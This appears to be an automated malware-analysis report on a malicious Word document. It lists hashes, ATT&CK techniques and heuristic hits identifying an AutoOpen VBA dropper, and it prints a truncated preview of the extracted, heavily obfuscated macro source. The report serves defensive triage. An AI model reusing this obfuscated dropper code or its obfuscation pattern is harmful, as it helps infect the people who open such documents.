Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 58f4ca331db447aa…

MALICIOUS

Office (OLE)

192.5 KB Created: 2018-03-05 20:58:00 Authoring application: Microsoft Office Word First seen: 2018-08-05
MD5: b54d8616efca00a2f0db866bb796f799 SHA-1: 63cce75cbfc3f6e1d1091f57fe0589e4fafde38d SHA-256: 58f4ca331db447aa2263e381e8f15e08d71e24a852d866916a9b9a1305cac056
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a malicious VBA macro. The macro utilizes CreateObject and has an AutoOpen function, indicating it's designed to execute code upon opening. ClamAV identifies it as a dropper, suggesting it downloads and executes a secondary payload. The presence of the 'macros.bas' artifact further confirms the macro's role.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6464705-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6464705-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 65846 bytes
SHA-256: 11303b3da91b9f17fb0659b1cf266525e8027de197b596537f0763e9914b2ab5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 30 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NYJXNQOOOMsfl"
Function PtKdZMcjCw()
On Error Resume Next
IOimbfw = "frKtOVGwm tes&&QFiwsQhUsWvwnMjGwSm"
runqNP = 1875727 / Atn(pnkhNLN) / (6411634 - SNlDbDD / 6496754 - Sqr(QrLLbzpj * CStr(NMfXCBNiLRQJK / Sgn(5454866 - CDate(2448966 / UznLJMrKYCSz * 5799923 * Sqr(lrhTAUh))))) + (LkpzslRIGPwaHC - 487255 / 3908564 / CLng(6600664)))
jIzNOm = 226281 / Atn(VzzjNAzjY) / (5449673 - csCYmDWMUFsPw / 635475 - Sqr(DEipN * CStr(wwMwLAbzsFtj / Sgn(2980359 - CDate(7448752 / XiQzzW * 6284894 * Sqr(cjCfMwvz))))) + (PFdtqcaCuPb - 9920963 / 9849967 / CLng(6732541)))
BtjDvwwziW = wibMARLCDaWv + dd333h3sd(IOimbfw, 14, 12)
zHGtpjoNoj = "ZRav%!=%8rav% teEmUXjoEH"
dHzhYXnB = 5031534 / Atn(YQXsZZoiwIhRL) / (346509 - nizvB / 873463 - Sqr(bhiIOYADJi * CStr(ZEcoPnrRc / Sgn(7828180 - CDate(9510954 / SLbPdlAF * 4831967 * Sqr(uopOQLPivwzt))))) + (zYzSJDjbpiRM - 9473408 / 7501517 / CLng(1752874)))
wRvhTl = 4438788 / Atn(IczoJowB) / (4416312 - CutwRZZdriS / 8167895 - Sqr(pJFKY * CStr(TYGLd / Sgn(8092919 - CDate(4350128 / zokARmXhhvfAn * 4482936 * Sqr(RtwSbJ))))) + (DdZzDHviPI - 8923273 / 6029334 / CLng(5564135)))
ORmfPh = QvfVSpPPShj + dd333h3sd(zHGtpjoNoj, 9, 14)
maiSSmcTd = "aPaWWCbdwkEsK% tes&&mLBpVZoSzitFtVIAwswKvJz"
tTJKOqvoBFd = 2741973 / Atn(NNujfaP) / (8355956 - iEzdNEbANwO / 8609215 - Sqr(DrqrujVMuS * CStr(TpUOODoaQrC / Sgn(4552942 - CDate(4881835 / UqKFz * 7557403 * Sqr(RkJDtnfjWVjmQJ))))) + (jNmJHockB - 3782924 / 3317393 / CLng(7989582)))
DlPQVNz = 5053195 / Atn(KGufhBFKKUPJu) / (8806077 - SlIswGwSp / 6149103 - Sqr(pzIjbwE * CStr(LOoHiITZDRuz / Sgn(8895951 - CDate(6695657 / iiIzdnN * 7684243 * Sqr(zWMFCa))))) + (REHhHdiajdhtA - 9134785 / 6591533 / CLng(3187208)))
iiInDD = GdBDdIbJiYOwO + dd333h3sd(maiSSmcTd, 24, 16)
ARoPdQw = "cTwjvDbEH !%6rivqtBmv"
HszThcq = 513823 / Atn(rbcApJc) / (7707303 - DNFtTfIwWQ / 2764215 - Sqr(GawoFHORNp * CStr(bciPcoDkaLiLRL / Sgn(6072995 - CDate(8467065 / KbOfo * 6734207 * Sqr(BdMkBNWQOPdR))))) + (QjJSjnQYOhcZ - 3043683 / 2318344 / CLng(1242326)))
iddrVH = 7360936 / Atn(TntwNzbTiN) / (7859063 - zBiOHmiR / 9203198 - Sqr(ASMnwkKlBQiowq * CStr(mChhzzabG / Sgn(3356310 - CDate(6198493 / LIZbViUmamaCr * 1784630 * Sqr(LYnIFrqUkzjwBZ))))) + (GVPqwccoJJcDz - 121535 / 5400216 / CLng(5791280)))
zWjwN = lZBTAa + dd333h3sd(ARoPdQw, 8, 5)
WOjHoOIfL = "iawfLXvVIIcv% tes&&uviBjnEHv"
wzKwHpLi = 3884975 / Atn(DqZAT) / (1170278 - iAtoP / 5511805 - Sqr(sbzzjtfmfRv * CStr(whoAtXdro / Sgn(1543186 - CDate(7743448 / MqYcWZJRWFk * 5409931 * Sqr(XwaUQLHEzJ))))) + (qzzQmlrk - 7598726 / 3082209 / CLng(7513935)))
ziVHjvZqcZk = 8573490 / Atn(DPFIizqz) / (2396409 - WbCWXwjcO / 6243500 - Sqr(mXZsil * CStr(zoNjDFR / Sgn(200109 - CDate(1032849 / ZwTVdccpjOTnHn * 4704053 * Sqr(ORsjPAO))))) + (zXJmXwFWrj - 652759 / 3124240 / CLng(2564549)))
qrnzvi = qzPDSIbCVopdl + dd333h3sd(WOjHoOIfL, 2, 16)
SVoRwU = "BdIKXFZKkOibBDzDU=%IWAwYIGo"
poUiwvjpPz = 1732557 / Atn(PkOlhEiddFbb) / (3141157 - Vcczii / 4297893 - Sqr(sYnsNCcZJoN * CStr(mrrzaIQldl / Sgn(5250437 - CDate(3199036 / kqNuWNaOjrqzpq * 6150316 * Sqr(DwnOo))))) + (dkcXWSkF - 1356583 / 9374849 / CLng(4433909)))
QHzwQRU = 9067659 / Atn(MOimbnNFzB) / (274278 - RkjZpnCIPMcS / 9929523 - Sqr(HibkuauMTmYJM * CStr(aOdjbmEiAf / Sgn(3456051 - CDate(1779357 / mOzmMnkj * 6721324 * Sqr(PGaqFQzAfa))))) + (iAisqNmZdv - 3630297 / 7070643 / CLng(1194167)))
EFABOnjhJP = IuwCuWvLhaLr + dd333h3sd(SVoRwU, 7, 9)
zTuok = "pDjNwOWBrGQJPXudvumlnnEzYj1rav%jwoiFpHGRR"
HsHOcclKz = 3832561 / Atn(iVuqwO) / (3994084 - DOBIJEumTaESC / 8006983 - Sqr(FbKnSoHjDmZi * CStr(aQsNPRKiv / Sgn(4207480 - CDate(4255814 / RMLrK * 297652 * Sqr(pioPn))))) + (CEvfwWkWXL - 667607 / 6562671 / CLng(8268411)))
QTUamqRtUV = 622760 / Atn(iEKFojAcvrs) / (7160044 - somAEnMM / 2841844 - Sqr(wzlht * CStr(IJTwU / Sgn(1976212 - C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.